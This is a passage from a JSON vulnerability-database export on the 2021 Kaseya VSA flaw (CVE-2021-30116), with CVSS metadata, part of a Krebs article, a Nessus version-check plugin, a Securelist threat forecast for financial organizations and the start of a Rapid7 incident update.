Kaseya was "very cooperative," and "asked the right questions."\n\n"Also, partial patches were shared with us to validate their effectiveness," Gevers wrote. "During the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched. They showed a genuine commitment to do the right thing. Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch."\n\nStill, Kaseya has yet to issue an official patch for the flaw Boonstra reported in April. Kaseya [told customers on July 7](<https://venturebeat.com/2021/07/07/kaseya-patch-fixing-zero-day-attack-delayed-as-issues-hit-saas-rollout/>) that it was working "through the night" to push out an update.\n\nGevers said the Kaseya vulnerability was discovered as part of a larger DIVD effort to look for serious flaws in a wide array of remote network management tools. \n\n"We are focusing on these types of products because we spotted a trend where more and more of the products that are used to keep networks safe and secure are showing structural weaknesses," he wrote.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T15:22:58", "type": "krebs", "title": "Kaseya Left Customer Portal Vulnerable to 2015 Flaw in its Own Software", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862", "CVE-2021-30116"], "modified": "2021-07-08T15:22:58", "id": "KREBS:6C9A4C86453CF1F4DA06688B3CC1E186", "href": "https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:51:44", "description": "The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as referenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. (CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T00:00:00", "type": "nessus", "title": "Kaseya VSA < 9.5.7a Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30119", "CVE-2021-30120"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:kaseya:virtual_system_administrator", "cpe:/a:kaseya:vsa"], "id": "KASEYA_9_5_7_2994.NASL", "href": "https://www.tenable.com/plugins/nessus/151494", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151494);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-30116\", \"CVE-2021-30119\", \"CVE-2021-30120\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0033\");\n\n script_name(english:\"Kaseya VSA < 9.5.7a Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Kaseya VSA instance installed on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as \nreferenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. (CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kaseya.com/potential-attack-on-kaseya-vsa/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Kaseya VSA version 9.5.7a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30116\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kaseya:virtual_system_administrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kaseya:vsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"kaseya_vsa_detect.nbin\");\n script_require_keys(\"installed_sw/Kaseya Virtual System Administrator\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n var port = get_http_port(default:443);\n var app_info = vcf::get_app_info(app:'Kaseya Virtual System Administrator', port:port, webapp:TRUE);\n\nvar constraints = [\n { 'min_version' : '0.0', 'fixed_version' : '9.5.7.2994'}\n];\n\nvcf::kaseya_vsa::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-11-25T08:40:17", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23091410/ksb-2021_Finance_organization-990x400.jpg)\n\nFirst of all, we are going to analyze [the forecasts we made ](<https://securelist.com/cyberthreats-to-financial-organizations-in-2021/99591/>)at the end of 2020 and see how accurate they were. Then we will go through the key events of 2021 relating to attacks on financial organizations. Finally, we will make some forecasts about financial attacks in 2022.\n\n## Analysis of forecasts for 2021\n\n * _The COVID-19 pandemic is likely to cause a massive wave of poverty, and that invariably translates into more people resorting to crime, including cybercrime. We might see certain economies crashing and local currencies plummeting, which would make Bitcoin theft a lot more attractive. We should expect more fraud, [targeting mostly BTC](<https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/>), because this cryptocurrency is the most popular._\n\n**Yes.** Data from the [Brazilian Federation of Banks](<https://noomis.febraban.org.br/videos/brasileiros-temem-fraudes-e-veem-alta-nas-violacoes-de-dados-indica-estudo>) registered a considerable increase in crime (such as explosions at bank branches to steal money) and cybercrime (increased phishing and social-engineering attacks) against banking customers and banking infrastructure. Of course, this is the result of economic problems caused by the pandemic.\n\nIn addition, bitcoin ended 2020 at around $28,000 and quickly rose to a peak of $40,000 in January 2021. Currently, at a value of approximately $60,000, cybercriminals have adapted their malware to monitor the operating system's clipboard and redirect funds to addresses under their control. In fact, from January through the end of October, Kaspersky detected more than 2,300 fraudulent global resources aimed at 85,000 potential crypto investors or users who are interested in cryptocurrency mining. The lockdown's effect on the global economy is leading emerging markets and different regions to adopt cryptocurrency as legal tender or at least as a way of storing value during these times.\n\n * _MageCart attacks moving to the server side. We can see that the number of threat actors that rely on client-side attacks (JavaScript) is diminishing by the day. It is reasonable to believe that there will be a shift to the server side._\n\n**Yes.** Magecart Group 12, known for skimming payment information from online shoppers, now uses PHP web shells to gain remote administrative access to the sites under attack to steal credit card data, rather than using their previously favored JavaScript code. A file that attempts to pass itself as 'image/png' but does not have the proper .PNG format loads a PHP web shell in compromised sites by replacing the legitimate shortcut icon tags with a path to the fake .PNG file. The web shell is harder to detect and block because [it injects the skimmer code on the server-side rather than the client-side](<https://threatpost.com/magecart-server-side-itactics-changeup/166242/>).\n\n * _A re-integration and internalization of operations inside the cybercrime ecosystem: the major players on the cybercrime market and those who made enough profit will mostly rely on their own in-house development, reducing outsourcing to boost their profits._\n\n**Yes.** Lots of groups recruited numerous affiliates, but this approach comes with the potential problems of human error and leaks. To boost their profits and depend less on outsourcing, some groups such as Revil even [scammed their affiliates](<https://www.bankinfosecurity.com/blogs/revil-ransomware-groups-latest-victim-its-own-affiliates-p-3125>), adding a backdoor capable of hijacking negotiations with victims and taking the 70% of the ransom payments that is supposed to go to the affiliates.\n\nThe Conti Gang was another group that also had issues with their associates when an apparently vengeful affiliate [leaked the ransomware group's playbook](<https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/>) after claiming the notorious cybercriminal organization underpaid him for doing its dirty work. The data revealed in the post included the IP addresses for the group's Cobalt Strike command-and-control servers (C2s) and a 113MB archive containing numerous tools and training materials explaining how Conti performs ransomware attacks.\n\n * _Advanced threat actors from countries placed under economic sanctions may rely more on ransomware imitating cybercriminal activity. They may reuse publicly available code or create their own campaigns from scratch._\n\n**Yes.** In April 2021, the Andariel group attempted to spread custom Ransomware. According to the Korean Financial Security Institute, Andariel is a [sub-group of the Lazarus](<https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1138.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=>) threat actor. Interestingly, one victim was found to have received ransomware after the third stage payload. This [ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) sample is custom made and developed explicitly by the threat actor behind this attack. This ransomware is controlled by command line parameters and can either retrieve an encryption key from the C2 or an argument at launch time.\n\n * _As ransomware groups continue to maximize profits, we should expect to see the use of 0-day exploits as well as N-day exploits in upcoming attacks. These groups will purchase both to expand the scale of their attacks even further, boosting their success rate, and resulting in more profit._\n\n**Definitely yes.** We saw many attacks using N-days, such as the attack that targeted the [Brazilian Supreme Court](<https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/>) (exploiting vulnerabilities in VMWare ESXI (CVE-2019-5544 and CVE-2020-3992). Also, many groups relied on vulnerabilities in VPN servers. Threat actors conducted a series of attacks using the Cring ransomware. An incident investigation [conducted](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) by Kaspersky ICS CERT at one of the attacked enterprises revealed that they exploited a vulnerability in FortiGate VPN servers (CVE-2018-13379).\n\nWe also saw attackers relying on 0-days. Probably the most impactful was the Kaseya compromise, using supply-chain vulnerabilities to distribute ransomware (CVE-2021-30116). Another impressive attack, also relying on supply-chain compromise, [was against BQE Software](<https://www.bleepingcomputer.com/news/security/hackers-used-billing-software-zero-day-to-deploy-ransomware/>), the company behind billing software BillQuick, which claims to have a 400,000 strong user base worldwide. An unknown ransomware group exploited a critical SQL injection bug found in the BillQuick Web Suite time and billing solution to deploy ransomware on their targets' networks in ongoing attacks (CVE-2021-42258). \nAs these groups have deep pockets with all the money they have received from numerous attacks, we can expect more attacks exploiting N-days and 0-days to deliver ransomware to lots of targets.\n\n * _Cracking down hard on the cybercrime world. In 2020, OFAC [announced](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20201001>) that they would supervise any payment to ransomware groups. Then US Cyber Command [took down Trickbot](<https://www.cyberscoop.com/trickbot-takedown-cyber-command-microsoft/>) temporarily ahead of the elections. There should be an expansion of the "[persistent engagement](<https://www.npr.org/2019/08/26/747248636/persistent-engagement-the-phrase-driving-a-more-assertive-u-s-spy-agency?t=1604481013627>)" strategy to financial crime. There is also a possibility of economic sanctions against institutions, territories or even countries that show a lack of resolve to combat cybercrime that originates on their territory._\n\n**Yes.** With continued opposition to ransomware payments, OFAC made clear its view that making ransomware payments encourages future ransomware attacks and, if such payments (and related services and facilitation) violate US sanctions prohibitions, may expose payment participants to [OFAC sanctions enforcement](<https://www.insideprivacy.com/data-security/ofac-issues-updated-guidance-on-ransomware-payments/>). And while "the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers," the Updated Advisory strongly discourages all private companies and citizens from paying the ransom or extortion demands and recommends focusing on strengthening defensive and resilience measures to prevent and protect against ransomware attacks.\n\nThe [Updated Advisory on Potential Sanctions Risks for Facilitating Ransomware Payments](<https://home.treasury.gov/system/files/126/ofac_ransomware_advisory.pdf>) describes the potential sanctions risks associated with making and facilitating ransomware payments and provides information for contacting relevant US government \nagencies, including OFAC, if there is any reason to suspect the cyber actor demanding ransomware payment may be sanctioned or otherwise have a sanctions nexus.\n\nIn addition, a new proposed law compels US businesses to disclose any ransomware payments within 48 hours of the transaction. T[he Ransom Disclosure Act](<https://www.warren.senate.gov/newsroom/press-releases/warren-and-ross-introduce-bill-to-require-disclosures-of-ransomware-payments>) will:\n\n * Require ransomware victims (excluding individuals) to disclose information about ransom payments no later than 48 hours after the date of payment, including the amount of ransom demanded and paid, the type of currency used for payment of the ransom, and any known information about the entity demanding the ransom;\n * Require DHS to make public the information disclosed during the previous year, excluding identifying information about the entities that paid ransoms;\n * Require DHS to establish a website through which individuals can voluntarily report payment of ransoms;\n * Direct the Secretary of Homeland Security to conduct a study on commonalities among ransomware attacks and the extent to which cryptocurrency facilitated these attacks and provide recommendations for protecting information systems and strengthening cybersecurity.\n\nThe US Department of the Treasury recently sanctioned two virtual currency exchanges, which helped ransomware threat actors to process victims' payments. Back in September 2021, [SUEX](<https://home.treasury.gov/news/press-releases/jy0364>) got sanctioned and accused of money laundering. In November 2021, [Chatex](<https://home.treasury.gov/news/press-releases/jy0471>), which is directly connected to SUEX, also got sanctioned with similar charges, according to public information.\n\n * _With the special technical capabilities of monitoring, deanonymization and [seizing](<https://www.bbc.com/news/amp/technology-54833130>) of BTC accounts now in place, we should expect cybercriminals to switch to transit cryptocurrencies for charging victims. There is reason to believe they might switch to other privacy-enhanced currencies, such as Monero, to use these first as a transition currency and then convert the funds to any other cryptocurrency of choice including BTC._\n\n**No.** While the Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside>) $2.3 million in cryptocurrency paid to the ransomware extortionists Darkside, other privacy and anonymity-focused cryptocurrencies such as Monero, Dash or Zcash, still aren't the default choice used by cybercriminal groups. With more regulatory pressure aimed at exchanges, threat actors attempting to cash out ransomware bounties obtained through anonymous coins could face additional difficulties than those that rely on Bitcoin or Ethereum for their illegal businesses. Even if the payments are traceable, different coin-mixing and coin-laundering underground services facilitate re-entering funds into the legitimate exchange ecosystem. Monero, among other similar cryptocurrencies, has been delisted (banned from operating) from popular exchanges. Using it for trading or simply swapping is not as easy as it used to be.\n\n * _Extortion on the rise. One way or another, cybercriminals targeting financial assets will rely on extortion. If not ransomware, then DDoS or possibly both. This could be especially critical to companies that lose data, go through an exhausting data recovery process and then have their online operations knocked out._\n\n**Yes.** 2021 saw the appearance of two new botnets. News broke in January of the FreakOut malware that attacks Linux devices. Cybercriminals exploited several critical vulnerabilities in programs installed on victim devices, including the newly discovered CVE-2021-3007. Botnet operators use infected devices to carry out DDoS attacks or mine cryptocurrency.\n\nCybercriminals also found a host of new tools for amplifying DDoS attacks.\n\nThe most significant event in Q1 was the COVID-19 vaccination program. As new segments of the population became eligible for vaccination, related websites [suffered interruptions](<https://securelist.com/ddos-attacks-in-q1-2021/102166/>). For example, at the end of January, a vaccine registration website in the US state of Minnesota crashed under the load.\n\nWe have seen how some groups like Egregor (arrested) extorted via massive LAN printing. Other groups rely on telephone calls, leaving voice messages and threatening employees and their families.\n\n## Key events in 2021\n\n * **Ransomware threat actor arrests**\n\nWith ransomware attacks going wild and stealing the headlines this year, law enforcement all around the world intensified their fight against ransomware groups. In 2021, we saw Egregor, one of the noisiest ransomware families, reborn from Sekhmet and previously from Maze, [get busted](<https://www.zdnet.com/article/egregor-ransomware-operators-arrested-in-ukraine/>). Another case in point is REvil, aka Sodinokibi, that came from GandCrab, which came from Cerber. In November, some of their affiliates [were arrested](<https://www.interpol.int/en/News-and-Events/News/2021/Joint-global-ransomware-operation-sees-arrests-and-criminal-network-dismantled>) as well. The arrest of [Yaroslav Vasinskyi](<https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya>) and the charges against Yevgeniy Polyanin are excellent examples of effective international cooperation in the cybercrime fight. \n\n * **Facebook incidents (a data breach in April and a data leak in October)**\n\nBecause of Facebook's rebrand and new mission announced by its CEO, the company's [data leaks](<https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/>) may represent a severe risk to their customers. Some companies have gone entirely virtual, and an account takeover could cause severe harm to their business or sales. \nWe also learned that Meta's goal is to consolidate people's lives, connecting them in all aspects of life, including financially. This concerns, for instance, money transfers and, potentially, other financial activities. With customers' plain text information disclosed by leaks on the internet, cybercriminals have gained new attack possibilities. \n\n * **Android Trojan bankers on the rise**\n\nThis year, we saw more Android Trojan bankers targeting users worldwide with a special focus on Europe, Latin America and the Middle East. In 2021, we have witnessed several families, such as RealRAT, Coper, Bian, SMisor, [Ubel](<https://twitter.com/dimitribest/status/1440737695571996673?s=20>), [TwMobo](<https://www.kaspersky.com.br/blog/hackers-brasileiros-exportam-virus-mobile-banking-twmobo/18026/>), [BRata](<https://securelist.com/spying-android-rat-from-brazil-brata/92775/>), and [BasBanke](<https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/>) actively targeting mobile users. Some of those campaigns are accompanied by social engineering where the threat actor calls the victim and sends a specially crafted text message with a download link leading to a malicious APK file after a short conversation.\n\n## Forecasts for 2022\n\n * **Rise and consolidation of information stealers**\n\nOur telemetry shows an exponential growth in infostealers in 2021. Given the variety of offers, low costs, and effectiveness, we believe this trend will continue. Additionally, it might even be used as a bulk collector for targeted and more complex attacks.\n\n * **Cryptocurrency targeted attack**\n\nThe cryptocurrency business continues to grow, and people continue to invest their money in this market because it's a digital asset and all transactions occur online. It also offers anonymity to users. These are attractive aspects that cybercrime groups will be unable to resist. \nAnd not only cybercrime groups but also state-sponsored groups who have already started targeting this industry. After the Bangladesh bank heist, the BlueNoroff group is still aggressively attacking the cryptocurrency business, and we anticipate this activity will continue.\n\n * **More cryptocurrency-related threats: fake hardware wallets, smart contract attacks, DeFi hacks and more**\n\nWhile in some regions cryptocurrency [has been banned](<https://www.nytimes.com/2021/09/24/business/china-cryptocurrency-bitcoin.html>), it has received official recognition and acceptance in others. And it's not just about El Salvador. For example, the Mayor of Miami [declared](<https://markets.businessinsider.com/news/currencies/miami-bitcoin-yield-miamicoin-crypto-francis-suarez-mayor-digital-wallet-2021-11?op=1>) that the City plans to start paying residents who use cryptocurrency, and he [stated on Twitter](<https://twitter.com/FrancisSuarez/status/1455562833006059528?s=20>) that he would receive his salary 100% in bitcoin. \nWhile some people consider it risky to invest in cryptocurrencies, those who do realize that their wallet is the weakest link. While most infostealers can easily steal a locally stored wallet, a [cloud-based one](<https://www.ledger.com/addressing-the-july-2020-e-commerce-and-marketing-data-breach>) is also susceptible to attacks with the risk of losing funds. Then there are hardware-based cryptocurrencies wallets. But the question is, are there sufficiently reliable and transparent security assessments to prove that they are safe? \nIn the scramble for cryptocurrency investment opportunities, we believe that cybercriminals will take advantage of fabricating and selling rogue devices with backdoors, followed by social engineering campaigns and other methods to steal victims' financial assets.\n\n * **Targeted ransomware \u2013 more targeted and more regional**\n\nWith the [international efforts](<https://www.interpol.int/en/News-and-Events/News/2021/Joint-global-ransomware-operation-sees-arrests-and-criminal-network-dismantled>) to crack down on major targeted ransomware groups, we will see a rise in small regionally derived groups focused on regional victims. \n\n * **The adoption of Open Banking in more countries may lead to more opportunities for cyberattacks**\n\nThe UK was the pioneer, but nowadays [many countries are adopting](<https://www.penser.co.uk/digital-banking/open-banking-in-countries-other-than-the-uk/>) it. As most of the Open Banking systems are based in APIs and Web API queries, performed by financial institutions, we can expect more attacks against them, [as pointed out by Gartner](<https://www.darkreading.com/threat-intelligence/cybercriminals-ramp-up-attacks-on-web-apis>): "in 2022, API abuses will move from an infrequent to the most frequent attack vector, resulting in data breaches for enterprise web applications."\n\n * **Mobile banking Trojans on the rise**\n\nAs [mobile banking experienced booming adoption](<https://www.forbes.com/sites/johnkoetsier/2020/04/15/report-35-85-fintech-growth-on-mobile-thanks-to-coronavirus-after-1-trillion-app-opens-in-2019/?sh=1399567b759a>) worldwide due the pandemic (in Brazil it represented 51% of all transactions in 2020), we can expect more mobile banking Trojans for Android, especially RATs that can bypass security measures adopted by banks (such as OTP and MFA). Regional Android implant projects will move globally, exporting attacks to Western European countries. \n\n * **Rise of threat to online payment systems**\n\nAmid the pandemic, many companies have gone digital and moved their systems online. And the longer people stay at home because of quarantine and lockdowns, the more they rely on online markets and payment systems. However, this rapid shift does is not accompanied by the appropriate security measures, and it is attracting lots of cybercriminals. This issue is particularly severe in developing countries, and the symptoms will last for a while.\n\n * **With more fintech apps out there, the increasing volume of financial data is attracting cybercriminals**\n\nThanks to online payment systems and fintech applications, lots of important personal information is stored on mobile. Many cybercrime groups will continue to attack personal mobile phones with evolved strategies such as deep fake technology and advanced malware to steal victims' data.\n\n * **Remote workers using corporate computers for entertainment purposes, such as online games, continue to pose financial threats to organizations**\n\nIn 2020, the number of gamers surpassed 2.7 billion, with the Asia-Pacific becoming the most active region. Even if video game platforms such as Steam reached all-time highs during April and May 2020, this year, Steam peaked at 27 million concurrent players in March. In our [Do cybercriminals play cyber games during quarantine?](<https://securelist.com/do-cybercriminals-play-cyber-games-during-quarantine/97241/>) article, we wrote that users relied on corporate laptops to play video games, watch movies and use e-learning platforms. This behavior was easy to identify because there was a boom in the Intel and AMD mobile graphic cards market in 2020-2021 compared to previous years. This trend is here to stay, and while during 2020, 46% of employees had never worked remotely before, now two-thirds of them state they wouldn't go back to an office, with the rest claiming to have a shorter office work week. \nCybercriminals spread malware and steal logins, in-game items, payment information and more through the use of video games such as Minecraft or Counter-Strike: Global Offensive. In addition, Hollywood blockbuster movies have become the perfect lure for those desperate to watch a film before it's released, and all from the comfort of their own homes. That was the case with the latest James Bond film, No Time to Die, with cybercriminals using adware, Trojans and ransomware to steal private information and even blackmailing victims who wanted their data back.\n\n * **ATM and PoS malware to return with a vengeance**\n\nDuring the pandemic, some locations saw PoS/ATM transaction levels drop significantly. Lockdowns forced people to stay at home and make purchases online, and this was mirrored in PoS/ATM malware too. As restrictions are lifted, we should expect the return of known PoS/ATM malware projects and the appearance of new projects. Cybercriminals will regain their easy physical access to ATMs and PoS devices at the same time as customers of retailers and financial institutions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T10:00:13", "type": "securelist", "title": "Cyberthreats to financial organizations in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5544", "CVE-2020-3992", "CVE-2021-3007", "CVE-2021-30116", "CVE-2021-42258"], "modified": "2021-11-23T10:00:13", "id": "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "href": "https://securelist.com/cyberthreats-to-financial-organizations-in-2022/104974/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-13T17:08:07", "description": "![Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies](https://blog.rapid7.com/content/images/2021/07/rapid7-og--1-.jpg)\n\nRapid7 is aware of and tracking all information surrounding a coordinated, mass ransomware attack reported to be affecting hundreds of organizations. Huntress Labs is maintaining a public [Reddit thread](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) documenting the scope and triage of an event that has, as of the original post date (see updates below), stemmed from 8 managed service providers. Rapid7 does not use Kaseya or a Kaseya MSP and we are not affected by this mass ransomware attack.\n\nRapid7 is updating this post as more information becomes available. Core information is below the most recent updates.\n\n### 2021-07-13\n\n * CISA has [updated their Kaseya ransomware event guidance](<https://us-cert.cisa.gov/kaseya-ransomware-attack>) for affected managed service providers and their customers.\n\n### 2021-07-11\n\n * In a video post today, Kaseya [has indicated](<https://videos.sproutvideo.com/embed/d39ddab51e14efc25a/50fb34477e68d73c?type=hd>) that they are still planning to go ahead with re-enabling an updated VSA SaaS and rollout of the on-prem VSA server update. Some runbook instructions have changed, so any organization planning on going live today should [review those changes](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) to see if they impact your environment.\n\n### 2021-07-09\n\n * The Dutch Institue for Vulnerability Disclosure (DIVD) [published](<https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/>) more information on the specific vulnerabilities they shared with Kaseya: \n * [CVE-2021-30116](<https://attackerkb.com/search?q=CVE-2021-30116>) \\- A credentials leak and business logic flaw, resolution in progress. [CVSS 10]\n * [CVE-2021-30117](<https://attackerkb.com/search?q=CVE-2021-30117>) \\- An SQL injection vulnerability, resolved in May 8th patch. [CVSS 9.8]\n * [CVE-2021-30118](<https://attackerkb.com/search?q=CVE-2021-30118>) \\- A Remote Code Execution vulnerability, resolved in April 10th patch. (v9.5.6) [CVSS 9.8]\n * [CVE-2021-30119](<https://attackerkb.com/search?q=CVE-2021-30119>) \\- A Cross Site Scripting vulnerability, resolution in progress. [CVSS 5.4]\n * [CVE-2021-30120](<https://attackerkb.com/search?q=CVE-2021-30120>) \\- 2FA bypass, resolution in progress. [CVSS 9.9]\n * [CVE-2021-30121](<https://attackerkb.com/search?q=CVE-2021-30121>) \\- A Local File Inclusion vulnerability, resolved in May 8th patch. [CVSS 6.5]\n * [CVE-2021-30201](<https://attackerkb.com/search?q=CVE-2021-30201>) \\- A XML External Entity vulnerability, resolved in May 8th patch. [CVSS 7.5]\n * President Biden [urged Vladimir Putin](<https://www.nytimes.com/2021/07/09/us/politics/putin-biden-ransomware-hackers.html?referringSource=articleShare>) to \u2018take action to disrupt\u2019 Russia-based hackers behind ransomware attacks.\n\n### 2021-07-08\n\n * Kaseya has [posted a video from their CEO](<https://videos.sproutvideo.com/embed/119ddab21e19e0cd98/19739709ce717d3b?type=hd>) notifying customers that patches and VSA SaaS will likely be available this coming Sunday afternoon (July 11, 2021).\n * According to Malwarebytes, some threat actors [are capitalizing on the extended response to the Kaseya mass ransomware attack](<https://twitter.com/MBThreatIntel/status/1412518446013812737?s=20>) and are targeting victims via email with fake patches that push Cobalt Strike payloads.\n\n### 2021-07-07\n\n * Kaseya has posted runbooks for [on premesis VSAs](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) with steps on how to prepare VSA servers for the forthcoming patch. These details include the installation of FireEye's agent software along with details on how to isolate the server from production networks, and [SaaS customers](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) for how to prepare for the SaaS VSAs coming back online.\n\n### 2021-07-06\n\n * In a [statement posted late Monday night](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>), Kaseya provided an update on their assessment of the impact of the attack: _"we are aware of 